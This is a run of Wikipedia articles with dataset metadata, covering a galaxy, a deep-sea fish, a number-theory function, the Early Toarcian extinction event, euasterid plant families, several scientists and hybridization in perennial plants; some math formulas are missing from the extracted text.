References
1962 births
Dutch physicists
Members of Academia Europaea
Members of the Royal Netherlands Academy of Arts and Sciences
Academic staff of the Free University of Berlin
Academic staff of Radboud University Nijmegen
Max Planck Society people
Chemical physicists
20th-century Dutch physicists
Radboud University Nijmegen alumni
IBM people
Max Planck Institute directors
People from Montferland
Living people | Gerard Meijer | [
"Chemistry"
] | 605 | [
"Chemical physicists"
] |
72,516,446 | https://en.wikipedia.org/wiki/Dithiofluorescein | Dithiofluorescein (sometimes generically called thiofluorescein) is a complexometric indicator used in analytical chemistry. It changes from blue to colorless when it binds to mercury(2+) ions. It thus can indicate the endpoint in the titration of thiols using o-hydroxymercuribenzoic acid or its sodium salt. The reagent can be immobilized t in a polymer on a fiber optic, which might allow development of a detector for sulfide ions in a flow cell. Unlike fluorescein and other related fluoran dyes that have oxygen substituents on the benzene rings, dithiofluorescein, which has sulfur substituents, is not fluorescent.
References
Analytical reagents
Complexometric indicators
Triarylmethane dyes
Spiro compounds
Lactones
Thiols | Dithiofluorescein | [
"Chemistry",
"Materials_science"
] | 186 | [
"Thiols",
"Chromism",
"Organic compounds",
"Complexometric indicators",
"Analytical reagents",
"Spiro compounds"
] |
72,519,086 | https://en.wikipedia.org/wiki/Miriam%20Pe%C3%B1a%20C%C3%A1rdenas | Miriam del Carmen Peña Cárdenas is a Chilean astronomer and cosmochemist whose research includes the chemical composition of interstellar clouds including H II regions and the planetary nebulae surrounding Wolf–Rayet stars. She is a professor and researcher at the National Autonomous University of Mexico (UNAM), in the UNAM Institute of Astronomy.
Education
Peña began her university studies in Chile, studying engineering, but moved to the National Autonomous University of Mexico to complete her bachelor's degree, and remained there for her graduate studies.
Recognition
Peña is a member of the Mexican Academy of Sciences. She was a 2007 winner of UNAM's Sor Juana Inés de la Cruz Recognition.
References
External links
Year of birth missing (living people)
Living people
Chilean astronomers
Women astronomers
Astrochemists
National Autonomous University of Mexico alumni
Academic staff of the National Autonomous University of Mexico
Members of the Mexican Academy of Sciences | Miriam Peña Cárdenas | [
"Chemistry",
"Astronomy"
] | 180 | [
"Women astronomers",
"Astronomers",
"Astrochemists"
] |
72,519,436 | https://en.wikipedia.org/wiki/Peekaboo%20Galaxy | The Peekaboo Galaxy (officially known as HIPASS J1131-31 and PGC 5060432) is an irregular blue compact dwarf galaxy in the constellation Hydra. The galaxy is relatively small, at about across. It is also relatively nearby, at a distance of around from Earth. The Peekaboo Galaxy is considered one of the most metal-poor ("extremely metal-poor" (XMP)), least chemically enriched, and seemingly primordial, galaxies known.
Discovery
History of observation
The Peekaboo Galaxy was hidden behind a relatively fast-moving foreground star, named TYC 7215-199-1, but during the second half of the 20th century, the star moved aside, clearing the view to the obscured galaxy, which gave the galaxy its name.
Detailed studies of the galaxy were reported in November 2022, and were based on work using the Hubble Space Telescope. The astronomers were able to closely examine about 60 of the individual stars in the galaxy, all appearing relatively young, a few billion years old or younger. In the words of Bärbel Koribalski, astronomer at CSIRO in Australia, original discoverer of the galaxy in 2001, and coauthor of the 2022 study of the galaxy, "At first we did not realize how special this little galaxy is ... Now with combined data from the Hubble Space Telescope, the Southern African Large Telescope (SALT), and others, we know that the Peekaboo Galaxy is one of the most metal-poor galaxies ever detected."
According to current thinking, early in the formation of the universe, 13.8 billion years ago, the earliest first stars were made, and were mostly composed of hydrogen and helium. Later, these very early stars fused their hydrogen and helium into heavier elements, up to, and including, iron. Heavier elements, beyond iron, were later produced as a result of violent supernova explosions, scattering these newly formed heavier elements throughout the Universe, where they would be incorporated into the formation of newer stars. The detection of the relatively close extremely metal-poor Peekaboo Galaxy may help astronomers better understand the formation of the very earliest stars and galaxies.
Future studies
Karachentsev et al. write that the age of the Peekaboo Galaxy is "decidedly ambiguous".
Future further studies of the galaxy with the Hubble Space Telescope and the James Webb Space Telescope are being considered.
See also
Galaxy formation and evolution
I Zwicky 18
List of galaxies
Metallicity distribution function
Stellar classification
Stellar evolution
Stellar population
References
External links
Peekaboo Galaxy (video; 2:51) (NASA Space News; 12 December 2022)
?
Dwarf galaxies
Hydra (constellation) | Peekaboo Galaxy | [
"Astronomy"
] | 548 | [
"Hydra (constellation)",
"Constellations"
] |
72,519,458 | https://en.wikipedia.org/wiki/Saccopharynx%20berteli | Saccopharynx berteli is a species of ray-finned fish within the family Saccopharyngidae. It is known from a single holotype collected from the central Pacific Ocean through an open fishing net at a depth of in 1977. The individual caught was an immature male with a length of . It has been classified as a 'Data deficient' species by the IUCN Red List as there is little information regarding its population, ecology, distribution, and potential threats. It differs from the other nine species in the genus in morphometric characters, principally including the extreme elongation of the caudal region (88.5% of TL) compared with 71–82% in the other species.
References
Fish described in 2000
IUCN Red List data deficient species
Saccopharyngidae
Taxa named by Jørgen G. Nielsen
Deep sea fish
Species known from a single specimen
Fish of the Pacific Ocean | Saccopharynx berteli | [
"Biology"
] | 191 | [
"Individual organisms",
"Species known from a single specimen"
] |
72,520,168 | https://en.wikipedia.org/wiki/Hooley%27s%20delta%20function | In mathematics, Hooley's delta function (), also called Erdős--Hooley delta-function, defines the maximum number of divisors of in for all , where is the Euler's number. The first few terms of this sequence are
.
History
The sequence was first introduced by Paul Erdős in 1974, then studied by Christopher Hooley in 1979.
In 2023, Dimitris Koukoulopoulos and Terence Tao proved that the sum of the first terms, , for . In particular, the average order of to is for any .
Later in 2023 Kevin Ford, Koukoulopoulos, and Tao proved the lower bound , where , fixed , and .
Usage
This function measures the tendency of divisors of a number to cluster.
The growth of this sequence is limited by where is the number of divisors of .
See also
Divisor function
Euler's number
References
Divisor function
Arithmetic functions
Number theory
Integer sequences | Hooley's delta function | [
"Mathematics"
] | 202 | [
"Sequences and series",
"Discrete mathematics",
"Integer sequences",
"Mathematical structures",
"Recreational mathematics",
"Arithmetic functions",
"Mathematical objects",
"Combinatorics",
"Numbers",
"Number theory"
] |
72,520,525 | https://en.wikipedia.org/wiki/Amanita%20subnudipes | Amanita subnudipes is a species of Amanita found in Italy.
References
External links
subnudipes
Fungi of Europe
Fungus species | Amanita subnudipes | [
"Biology"
] | 32 | [
"Fungi",
"Fungus species"
] |
72,521,404 | https://en.wikipedia.org/wiki/Toarcian%20Oceanic%20Anoxic%20Event | The Toarcian extinction event, also called the Pliensbachian-Toarcian extinction event, the Early Toarcian mass extinction, the Early Toarcian palaeoenvironmental crisis, or the Jenkyns Event, was an extinction event that occurred during the early part of the Toarcian age, approximately 183 million years ago, during the Early Jurassic. The extinction event had two main pulses, the first being the Pliensbachian-Toarcian boundary event (PTo-E). The second, larger pulse, the Toarcian Oceanic Anoxic Event (TOAE), was a global oceanic anoxic event, representing possibly the most extreme case of widespread ocean deoxygenation in the entire Phanerozoic eon. In addition to the PTo-E and TOAE, there were multiple other, smaller extinction pulses within this span of time.
Occurring during the supergreenhouse climate of the Early Toarcian Thermal Maximum (ETTM), the Early Toarcian extinction was associated with large igneous province volcanism, which elevated global temperatures, acidified the oceans, and prompted the development of anoxia, leading to severe biodiversity loss. The biogeochemical crisis is documented by a high amplitude negative carbon isotope excursions, as well as black shale deposition.
Timing
The Early Toarcian extinction event occurred in two distinct pulses, with the first event being classified by some authors as its own event unrelated to the more extreme second event. The first, more recently identified pulse occurred during the mirabile subzone of the tenuicostatum ammonite zone, coinciding with a slight drop in oxygen concentrations and the beginning of warming following a late Pliensbachian cool period. This first pulse, occurring near the Pliensbachian-Toarcian boundary, is referred to as the PTo-E. The TOAE itself occurred near the tenuicostatum–serpentinum ammonite biozonal boundary, specifically in the elegantulum subzone of the serpentinum ammonite zone, during a marked, pronounced warming interval. The TOAE lasted for approximately 500,000 years, though a range of estimates from 200,000 to 1,000,000 years have also been given. The PTo-E primarily affected shallow water biota, while the TOAE was the more severe event for organisms living in deep water.
Causes
Geological, isotopic, and palaeobotanical evidence suggests the late Pliensbachian was an icehouse period. These ice sheets are believed to have been thin and stretched into lower latitudes, making them extremely sensitive to temperature changes. A warming trend lasting from the latest Pliensbachian to the earliest Toarcian was interrupted by a "cold snap" in the middle polymorphum zone, equivalent to the tenuicostatum ammonite zone, which was then followed by the abrupt warming interval associated with the TOAE. This global warming, driven by rising atmospheric carbon dioxide, was the mainspring of the early Toarcian environmental crisis. Carbon dioxide levels rose from about 500 ppm to about 1,000 ppm. Seawater warmed by anywhere between 3 °C and 7 °C, depending on latitude. At the height of this supergreenhouse interval, global sea surface temperatures (SSTs) averaged about 21 °C.
The eruption of the Karoo-Ferrar Large Igneous Province is generally attributed to have caused the surge in atmospheric carbon dioxide levels. Argon-argon dating of Karoo-Ferrar rhyolites points to a link between Karoo-Ferrar volcanism and the extinction event, a conclusion reinforced by uranium-lead dating and palaeomagnetism. Occurring during a broader, gradual positive carbon isotope excursion as measured by δ13C values, the TOAE is preceded by a global negative δ13C excursion recognised in fossil wood, organic carbon, and carbonate carbon in the tenuicostatum ammonite zone of northwestern Europe, with this negative δ13C shift being the result of volcanic discharge of light carbon. The global ubiquity of this negative δ13C excursion has been called into question, however, due to its absence in certain deposits from the time, such as the Bächental bituminous marls, though its occurrence in areas like Greece has been cited as evidence of its global nature. The negative δ13C shift is also known from the Arabian Peninsula, the Ordos Basin, and the Neuquén Basin. The negative δ13C excursion has been found to be up to -8% in bulk organic and carbonate carbon, although analysis of compound specific biomarkers suggests a global value of around -3% to -4%. In addition, numerous smaller scale carbon isotope excursions are globally recorded on the falling limb of the larger negative δ13C excursion. Although the PTo-E is not associated with a decrease in δ13C analogous to the TOAE's, volcanism is nonetheless believed to have been responsible for its onset as well, with the carbon injection most likely having an isotopically heavy, mantle-derived origin. The Karoo-Ferrar magmatism released so much carbon dioxide that it disrupted the imprint of the 9 Myr long-term carbon cycle that was otherwise steady and stable during the Jurassic and Early Cretaceous. The values of 187Os/188Os rose from ~0.40 to ~0.53 during the PTo-E and from ~0.42 to ~0.68 during the TOAE, and many scholars conclude this change in osmium isotope ratios evidences the responsibility of this large igneous province for the biotic crises. Mercury anomalies from the approximate time intervals corresponding to the PTo-E and TOAE have likewise been invoked as tell-tale evidence of the ecological calamity's cause being a large igneous province, although some researchers attribute these elevated mercury levels to increased terrigenous flux. There is evidence that the motion of the African Plate suddenly changed in velocity, shifting from mostly northward movement to southward movement. Such shifts in plate motion are associated with similar large igneous provinces emplaced in other time intervals. A 2019 geochronological study found that the emplacement of the Karoo-Ferrar large igneous province and the TOAE were not causally linked, and simply happened to occur rather close in time, contradicting mainstream interpretations of the TOAE. The authors of the study conclude that the timeline of the TOAE does not match up with the course of activity of the Karoo-Ferrar magmatic event.
The large igneous province also intruded into coal seams, releasing even more carbon dioxide and methane than it otherwise would have. Magmatic sills are also known to have intruded into shales rich in organic carbon, causing additional venting of carbon dioxide into the atmosphere. Carbon release via metamorphic heating of coal has been criticised as a major driver of the environmental perturbation, however, on the basis that coal transects themselves do not show the δ13C excursions that would be expected if significant quantities of thermogenic methane were released, suggesting that much of the degassed emissions were either condensed as pyrolytic carbon or trapped as coalbed methane.
In addition, possible associated release of deep sea methane clathrates has been potentially implicated as yet another cause of global warming. Episodic melting of methane clathrates dictated by Milankovitch cycles has been put forward as an explanation fitting the observed shifts in the carbon isotope record. Other studies contradict and reject the methane hydrate hypothesis, however, concluding that the isotopic record is too incomplete to conclusively attribute the isotopic excursion to methane hydrate dissociation, that carbon isotope ratios in belemnites and bulk carbonates are incongruent with the isotopic signature expected from a massive release of methane clathrates, that much of the methane released from ocean sediments was rapidly sequestered, buffering its ability to act as a major positive feedback, and that methane clathrate dissociation occurred too late to have had an appreciable causal impact on the extinction event. Hypothetical release of methane clathrates extremely depleted in heavy carbon isotopes has furthermore been considered unnecessary as an explanation for the carbon cycle disruption.
It has also been hypothesised that the release of cryospheric methane trapped in permafrost amplified the warming and its detrimental effects on marine life. Obliquity-paced carbon isotope excursions have been interpreted as some researchers as reflective of permafrost decline and consequent greenhouse gas release.
The TOAE is believed to be the second largest anoxic event of the last 300 Ma, and possibly the largest of the Phanerozoic. A positive δ13C excursion, likely resulting from the mass burial of organic carbon during the anoxic event, is known from the falciferum ammonite zone, chemostratigraphically identifying the TOAE. Large igneous province resulted in increased silicate weathering and an acceleration of the hydrological cycle, as shown by a increased amount of terrestrially derived organic matter found in sedimentary rocks of marine origin during the TOAE. Concentrations of phosphorus, magnesium, and manganese rose in the oceans. A -0.5% excursion in δ44/40Ca provides further evidence of increased continental weathering. Osmium isotope ratios confirm further still a major increase in weathering. The enhanced continental weathering in turn led to increased eutrophication that helped drive the anoxic event in the oceans. Continual transport of continentally weathered nutrients into the ocean enabled high levels of primary productivity to be maintained over the course of the TOAE. Rising sea levels contributed to ocean deoxygenation; as rising sea levels inundated low-lying lands, organic plant matter was transported outwards into the ocean. An alternate model for the development of anoxia is that epicontinental seaways became salinity stratified with strong haloclines, chemoclines, and thermoclines. This caused mineralised carbon on the seafloor to be recycled back into the photic zone, driving widespread primary productivity and in turn anoxia. The freshening of the Arctic Ocean by way of melting of Northern Hemisphere ice caps was a likely trigger of such stratification and a slowdown of global thermohaline circulation. Stratification also occurred due to the freshening of surface water caused by an enhanced water cycle. Rising seawater temperatures amidst a transition from icehouse to greenhouse conditions further retarded ocean circulation, aiding the establishment of anoxic conditions. Geochemical evidence from what was then the northwestern European epicontinental sea suggests that a shift from cooler, more saline water conditions to warmer, fresher conditions prompted the development of significant density stratification of the water column and induced anoxia. Extensive organic carbon burial induced by anoxia was a negative feedback loop retarding the otherwise pronounced warming and may have caused global cooling in the aftermath of the TOAE. In anoxic and euxinic marine basins in Europe, organic carbon burial rates increased by ~500%. Furthermore, anoxia was not limited to oceans; large lakes also experienced oxygen depletion and black shale deposition.
Euxinia occurred in the northwestern Tethys Ocean during the TOAE, as shown by a positive δ34S excursion in carbonate-associated sulphate occurs synchronously with the positive δ13C excursion in carbonate carbon during the falciferum ammonite zone. This positive δ34S excursion has been attributed to the depletion of isotopically light sulphur in the marine sulphate reservoir that resulted from microbial sulphur reduction in anoxic waters. Similar positive δ34S excursions corresponding to the onset of TOAE are known from pyrites in the Sakahogi and Sakuraguchi-dani localities in Japan, with the Sakahogi site displaying a less extreme but still significant pyritic positive δ34S excursion during the PTo-E. Euxinia is further evidenced by enhanced pyrite burial in Zázrivá, Slovakia, enhanced molybdenum burial totalling about 41 Gt of molybdenum, and δ98/95Mo excursions observed in sites in the Cleveland, West Netherlands, and South German Basins. Valdorbia, a site in the Umbria-Marche Apennines, also exhibited euxinia during the anoxic event. There is less evidence of euxinia outside the northwestern Tethys, and it likely only occurred transiently in basins in Panthalassa and the southwestern Tethys. Due to the clockwise circulation of the oceanic gyre in the western Tethys and the rough, uneven bathymetry in the northward limb of this gyre, oxic bottom waters had relatively few impediments to diffuse into the southwestern Tethys, which spared it from the far greater prevalence of anoxia and euxinia that characterised the northern Tethys. The Panthalassan deep water site of Sakahogi was mainly anoxic-ferruginous across the interval spanning the late Pliensbachian to the TOAE, but transient sulphidic conditions did occur during the PTo-E and TOAE. In northeastern Panthalassa, in what is now British Columbia, euxinia dominated anoxic bottom waters.
The early stages of the TOAE were accompanied by a decrease in the acidity of seawater following a substantial decrease prior to the TOAE. Seawater pH then dropped close to the middle of the event, strongly acidifying the oceans. The sudden decline of carbonate production during the TOAE is widely believed to be the result of this abrupt episode of ocean acidification. Additionally, the enhanced recycling of phosphorus back into seawater as a result of high temperatures and low seawater pH inhibited its mineralisation into apatite, helping contribute to oceanic anoxia. The abundance of phosphorus in marine environments created a positive feedback loop whose consequence was the further exacerbation of eutrophication and anoxia.
The extreme and rapid global warming at the start of the Toarcian promoted intensification of tropical storms across the globe.
Effects on life
Marine invertebrates
The extinction event associated with the TOAE primarily affected marine life as a result the collapse of the carbonate factory. Brachiopods were particularly severely hit, with the TOAE representing one of the most dire crises in their evolutionary history. Brachiopod taxa of large size declined significantly in abundance. Uniquely, the brachiopod genus Soaresirhynchia thrived during the later stages of the TOAE due to its low metabolic rate and slow rate of growth, making it a disaster taxon. The species S. bouchardi is known to have been a pioneer species that colonised areas denuded of brachiopods in the northwestern Tethyan region. Ostracods also suffered a major diversity loss, with almost all ostracod clades’ distributions during the time interval corresponding to the serpentinum zone shifting towards higher latitudes to escape intolerably hot conditions near the Equator. Bivalves likewise experienced a significant turnover. The decline of bivalves exhibiting high endemism with narrow geographic ranges was particularly severe. At Ya Ha Tinda, a replacement of the pre-TOAE bivalve assemblage by a smaller, post-TOAE assemblage occurred, while in the Cleveland Basin, the inoceramid Pseudomytiloides dubius experienced the Lilliput effect. Ammonoids, having already experienced a major morphological bottleneck thanks to the Gibbosus Event, about a million years before the Toarcian extinction, suffered further losses in the Early Toarcian diversity collapse. Belemnite richness in the northwestern Tethys dropped during the PTo-E but slightly increased across the TOAE. Belemnites underwent a major change in habitat preference from cold, deep waters to warm, shallow waters. Their average rostrum size also increased, though this trend heavily varied depending on the lineage of belemnites. The Toarcian extinction was unbelievably catastrophic for corals; 90.9% of all Tethyan coral species and 49% of all genera were wiped out. Calcareous nannoplankton that lived in the deep photic zone suffered, with the decrease in abundance of the taxon Mitrolithus jansae used as an indicator of shoaling of the oxygen minimum zone in the Tethys and the Hispanic Corridor. Other affected invertebrate groups included echinoderms, radiolarians, dinoflagellates, and foraminifera. Trace fossils, an indicator of bioturbation and ecological diversity, became highly undiverse following the TOAE.
Carbonate platforms collapsed during both the PTo-E and the TOAE. Enhanced continental weathering and nutrient runoff was the dominant driver of carbonate platform decline in the PTo-E, while the biggest culprits during the TOAE were heightened storm activity and a decrease in the pH of seawater.
The recovery from the mass extinction among benthos commenced with the recolonisation of barren locales by opportunistic pioneer taxa. Benthic recovery was slow and sluggish, being regularly set back thanks to recurrent episodes of oxygen depletion, which continued for hundreds of thousands of years after the main extinction interval. Evidence from the Cleveland Basin suggests it took ~7 Myr for the marine benthos to recover, on par with the Permian-Triassic extinction event. Many marine invertebrate taxa found in South America migrated through the Hispanic Corridor into European seas after the extinction event, aided in their dispersal by higher sea levels.
Marine vertebrates
The TOAE had minor effects on marine reptiles, in stark contrast to the major impact it had on many clades of marine invertebrates. In fact, in the Southwest German Basin, ichthyosaur diversity was higher after the extinction interval, although this may be in part a sampling artefact resulting from a sparse Pliensbachian marine vertebrate fossil record.
Terrestrial animals
The TOAE is suggested to have caused the extinction of various clades of dinosaurs, including coelophysids, dilophosaurids, and many basal sauropodomorph clades, as a consequence of the remodelling of terrestrial ecosystems caused by global climate change. Some heterodontosaurids and thyreophorans also perished in the extinction event. In the wake of the extinction event, many derived clades of ornithischians, sauropods, and theropods emerged, with most of these post-extinction clades greatly increasing in size relative to dinosaurs before the TOAE. Eusauropods were propelled to ecological dominance after their survival of the Toarcian cataclysm. Megalosaurids experienced a diversification event in the latter part of the Toarcian that was possibly a post-extinction radiation that filled niches vacated by the mass death of the Early Toarcian extinction. Insects may have experienced blooms as fish moved en masse to surface waters to escape anoxia and then died in droves due to limited resources.
Terrestrial plants
The volcanogenic extinction event initially impacted terrestrial ecosystems more severely than marine ones. A shift towards a low diversity assemblage of cheirolepid conifers, cycads, and Cerebropollenites-producers adapted for high aridity from a higher diversity ecological assemblage of lycophytes, conifers, seed ferns, and wet-adapted ferns is observed in the palaeobotanical and palynological record over the course of the TOAE. The coincidence of the zenith of Classopolis and the decline of seed ferns and spore producing plants with increased mercury loading implicates heavy metal poisoning as a key contributor to the floristic crisis during the Toarcian mass extinction. Poisoning by mercury, along with chromium, copper, cadmium, arsenic, and lead is speculated to be responsible for heightened rates of spore malformation and dwarfism concomitant with enrichments in all these toxic metals.
Geologic effects
The TOAE was associated with widespread phosphatisation of marine fossils believed to result from the warming-induced increase in weathering that increased phosphate flux into the ocean. This produced exquisitely preserved lagerstätten across the world, such as Ya Ha Tinda, Strawberry Bank, and the Posidonia Shale.
As is common during anoxic events, black shale deposition was widespread during the deoxygenation events of the Toarcian. Toarcian anoxia was responsible for the deposition of commercially extracted oil shales, particularly in China.
Enhanced hydrological cycling caused clastic sedimentation to accelerate during the TOAE; the increase in clastic sedimentation was synchronous with excursions in 187Os/188Os, 87Sr/86Sr, and δ44/40Ca.
Additionally, the Toarcian was punctuated by intervals of extensive kaolinite enrichment. These kaolinites correspond to negative oxygen isotope excursions and high Mg/Ca ratios and are thus reflective of climatic warming events that characterised much of the Toarcian. Likewise, illitic/smectitic clays were also common during this hyperthermal perturbation.
Palaeogeographic changes
The Intertropical Convergence Zone (ITCZ) migrated southwards across southern Gondwana, turning much of the region more arid. This aridification was interrupted, however, in the spinatus ammonite biozone and across the Pliensbachian-Toarcian boundary itself.
The large rise in sea levels resulting from the intense global warming led to the formation of the Laurasian Seaway, which enabled the flow of cool water low in salt content to flow into the Tethys Ocean from the Arctic Ocean. The opening of this seaway may have potentially acted as a mitigating factor that ameliorated to a degree the oppressively anoxic conditions that were widespread across much of the Tethys.
The enhanced hydrological cycle during early Toarcian warming caused lakes to grow in size. During the anoxic event, the Sichuan Basin was transformed into a giant lake, which was believed to be approximately thrice as large as modern-day Lake Superior. Lacustrine sediments deposited as a result of this lake's existence are represented by the Da’anzhai Member of the Ziliujing Formation. Roughly ~460 gigatons (Gt) of organic carbon and ~1,200 Gt of inorganic carbon were likely sequestered by this lake over the course of the TOAE.
Comparison with present global warming
The TOAE and the Palaeocene-Eocene Thermal Maximum have been proposed as analogues to modern anthropogenic global warming based on the comparable quantity of greenhouse gases released into the atmosphere in all three events. Some researchers argue that evidence for a major increase in Tethyan tropical cyclone intensity during the TOAE suggests that a similar increase in magnitude of tropical storms is bound to occur as a consequence of present climate change.
See also
Weissert Event
Selli Event
Bonarelli Event
References
Extinction events
Toarcian Stage
Isotope excursions | Toarcian Oceanic Anoxic Event | [
"Chemistry",
"Biology"
] | 4,832 | [
"Evolution of the biosphere",
"Isotope excursions",
"Extinction events",
"Isotopes"
] |
72,521,456 | https://en.wikipedia.org/wiki/Hyperphagia%20%28ecology%29 | In behavioral ecology, hyperphagia is a short-term increase in food intake and metabolization in response to changing environmental conditions. It is most prominent in a number of migratory bird species. Hyperphagia occurs when fat deposits need to be built up over the course of a few days or weeks, for example in wintering birds that are preparing to start on their spring migration, or when feeding habitat conditions improve for only a short duration.
In preparation for hibernation
Bears
Brown bears can double their weight from spring to autumn, gaining up to of fat. These deposits are used to survive their winter hibernation. During summer and autumn, brown bears have been observed consuming large amounts of insects, roots and bulbs, salmon, and other food sources depending on their location and the availability of food.
During the autumn months, American brown bears consume a large amount of hard masts and berries. Bears living near human settlements may break into buildings or vehicles to eat any food left inside. In some rare cases, the amount of food available from human activity is enough to disrupt regular hibernation behaviour.
In migratory birds
Mallards may engage in hyperphagia in response to winter floods that temporarily make available more wetlands for foraging, heavily increasing their daily food intake to make use of the additional food.
References
Behavioral ecology | Hyperphagia (ecology) | [
"Biology"
] | 265 | [
"Behavioural sciences",
"Ethology",
"Behavior",
"Behavioral ecology"
] |
72,522,672 | https://en.wikipedia.org/wiki/Raymond%20Sheline | Raymond K. Sheline (March 31, 1922 – February 10, 2016) was a member of the Manhattan Project and spent much of his career as a professor in chemistry and physics at Florida State University. Sheline's research focused on spectroscopic studies of atomic nuclei and molecular structures.
Education and career
Sheline was born in Port Clinton, Ohio and a graduate of Woodward High School. He studied at Bethany College in West Virginia, where he graduated in 1943. From 1943 till 1945, he worked on the Manhattan Project as a chemist at Columbia University. Sheline went to graduate school at University of California, Berkeley after World War II and obtained his PhD in chemistry there in 1949 under the supervision of Kenneth Pitzer. His PhD thesis dealt with vibrational spectroscopy of polyatomic molecules.
Sheline taught at the University of Chicago for two years after his PhD. From 1951 to 1999, Sheline was a professor in chemistry and physics at Florida State University. Between 1966 and 1967, he was named Robert O. Lawton Distinguished Professor.
Sheline was a three-time Guggenheim fellow and a Fulbright scholar.
Personal life
Sheline married Yvonne Sheline in 1951, they have seven children.
References
1922 births
2016 deaths
People from Port Clinton, Ohio
Spectroscopists
Bethany College (West Virginia) alumni
University of California, Berkeley alumni
Manhattan Project people
Florida State University faculty
University of Chicago faculty
American nuclear physicists
Chemical physicists | Raymond Sheline | [
"Chemistry"
] | 288 | [
"Chemical physicists"
] |
72,522,687 | https://en.wikipedia.org/wiki/Olof%20Lundberg | Olof Ingemar Lundberg (born 9 December 1943) was a Swedish business executive and a prominent figure in the mobile satellite services industry. He served as founding Director General and then CEO of Inmarsat (the International Maritime Satellite Organisation), a non-profit intergovernmental organisation created to establish and operate a satellite communications network for the maritime community, from 1979 to 1995; founding Chairman and CEO of ICO Global Communications 1995-2000; and Chairman and CEO of Globalstar 2001-2003.
Early life
Lundberg was born in Gothenburg, Sweden, on 9 December 1943. He went to school at Hvitfeldtska gymnasiet and studied electrical engineering at Chalmers University of Technology.
Career
Lundberg started his career as an engineer at Televerket (the Swedish Telecoms Administration), working there between 1967 and 1979. During that time, he developed Maritex, and automated HF Telex System.
In 1979, he was appointed the first Director General and then as CEO of Inmarsat (the International Maritime Satellite Organisation), where he served until 1995, leading the development of mobile satellite communications at sea, on land, and in the air.
Lundberg was Chairman and CEO of ICO Global Communications 1995-2000 and Chairman and CEO of Globalstar 2001-2003.
Lundberg has received the CCIR Award d'Honneur and the ITU Gold Medal. He was awarded the Arthur C Clarke Award and has twice received the Aviation Week and Space Technology Laureate Award and been inducted into their Hall of Fame. He received the Mobile Satellite User's Association (MSUA) Pioneer Award in 2009. He has received the Thulin Medal and the Tsiolkovsky Medal and is inducted to the SSPI Hall of Fame.
Personal life
Lundberg is an amateur radio enthusiast. He was inducted into the CQ Amateur Radio Hall of Fame in 2015. He lives in England.
References
Telecommunications engineers
Living people
People from Gothenburg
1943 births | Olof Lundberg | [
"Engineering"
] | 396 | [
"Telecommunications engineering",
"Telecommunications engineers"
] |
72,523,469 | https://en.wikipedia.org/wiki/List%20of%20euasterid%20families | The euasterids or core asterids are a group of 69 interrelated families in 15 orders of flowering plants. They tend to have petals that are fused with each other and with the bases of the stamens, and just one integument (covering) around the embryo sac. The asterids as a whole (the euasterids plus two orders of basal asterids) represent almost a third of all flowering plant species.
The euasterids include trees, shrubs, vines and herbaceous perennials and annuals. Sweet potatoes are a tropical staple food. Basil, oregano, sage, rosemary, thyme and peppermint are all kitchen herbs in the mint family. Olives have been cultivated around the Mediterranean for food and oil for at least five thousand years. The daisy family includes lettuce, artichokes, Stevia, sunflowers and tarragon.
Glossary
From the glossary of botanical terms:
annual: a plant species that completes its life cycle within a single year or growing season
basal: attached close to the base (of a plant or an evolutionary tree diagram)
climber: a vine that leans on, twines around or clings to other plants for vertical support
deciduous: falling seasonally, as with bark, leaves, or petals
glandular hair: a hair tipped with a secretory structure
herbaceous: not woody; usually green and soft in texture
mangrove: any shrub or small tree growing in brackish or salt water
perennial: not an annual or biennial
succulent (adjective): juicy or fleshy
unisexual: of one sex; bearing only male or only female reproductive organs
woody: hard and lignified; not herbaceous
The APG IV system is the fourth in a series of plant taxonomies from the Angiosperm Phylogeny Group. In this system, the euasterids are divided into the lamiids and the campanulids. The order Icacinales is basal within the lamiids.
Six euasterid orders have more than two families: Apiales, Aquifoliales, Asterales, Gentianales, Lamiales and Solanales. Apiales and Asterales are exceptionally diverse, with 2342 genera between them. Aquifoliales is basal within the campanulids. Gentianales species have pitted wood and opposite leaves that are joined across the stem. In Lamiales, plants are mostly herbaceous with opposite leaves, and the five-lobed flowers have approximate mirror-image symmetry. Solanales species usually have sepals that continue to grow with age, even when the plant is fruiting.
Families
See also
List of plant family names with etymologies
Notes
Citations
References
See the Creative Commons license.
See their terms-of-use license.
Systematic
Euasterid
Euasterid families
euasterid families | List of euasterid families | [
"Biology"
] | 591 | [
"Lists of biota",
"Lists of plants",
"Plants"
] |
72,524,757 | https://en.wikipedia.org/wiki/Hybridization%20in%20perennial%20plants | Hybridization, when new offspring arise from crosses between individuals of the same or different species, results in the assemblage of diverse genetic material and can act as a stimulus for evolution. Hybrid species are often more vigorous and genetically differed than their ancestors. There are primarily two different forms of hybridization: natural hybridization in an uncontrolled environment, whereas artificial hybridization (or breeding) occurs primarily for the agricultural purposes.
Types
There are mainly two types of hybridization: interspecific and intraspecific. Interspecific hybridization is the mating process between two different species. Intraspecific hybridization is the mating process within the species, often between genetically distinct lineages. Hybridization sometimes results in introgression, which can occur in response to habitat disturbance that puts plant species into contact with each other. Introgression is gene transfer among taxa and is a result of hybridization, followed by repeated backcrossing with parental individuals. Introgressive hybridization occurs often in plants, and results in increased genetic variation, which can facilitate rapid response to climate change.
Hybridization in perennial plant systems
Hybridization is considered to be an evolutionary catalyst capable of generating novel genotypes or phenotypes in a single generation. It can also happen with morphologically dissimilar but closely related species (Example: Helianthus giganteus, the giant sunflower).
In plants, hybridization mostly generates speciation events, and commonly produces polyploid species. Factors like polyploidy events also plays significant factors for understanding the hybridization events (Example: an F1 hybrid of Jatropha curcas x Ricinus communis), because these polyploids tend to have an advantage for the early stages of adaptation due to their expanded genomes. As a result, hybridization can be a powerful driver for improving agricultural crops, but can also facilitate unwanted species invasions (e.g., annual sunflower).
While hybridization in perennial plants can occur naturally, for example as the result of cross breeding with wild type relatives near agricultural fields, intentional hybridization in perennial crops has also been of recent interest in agriculture. While Hybridization and breeding methods have produced successful crop species, declining yield is a major challenge. Thus, further research is needed for leveraging hybridization in perennial crop systems to produce sustainable and high yielding crops. Some methods that are currently being explored include applying modern genotyping, phenotyping, and speed breeding techniques. When crosses in the laboratory are difficult, researchers can study hybrid zones that arise naturally in the field.
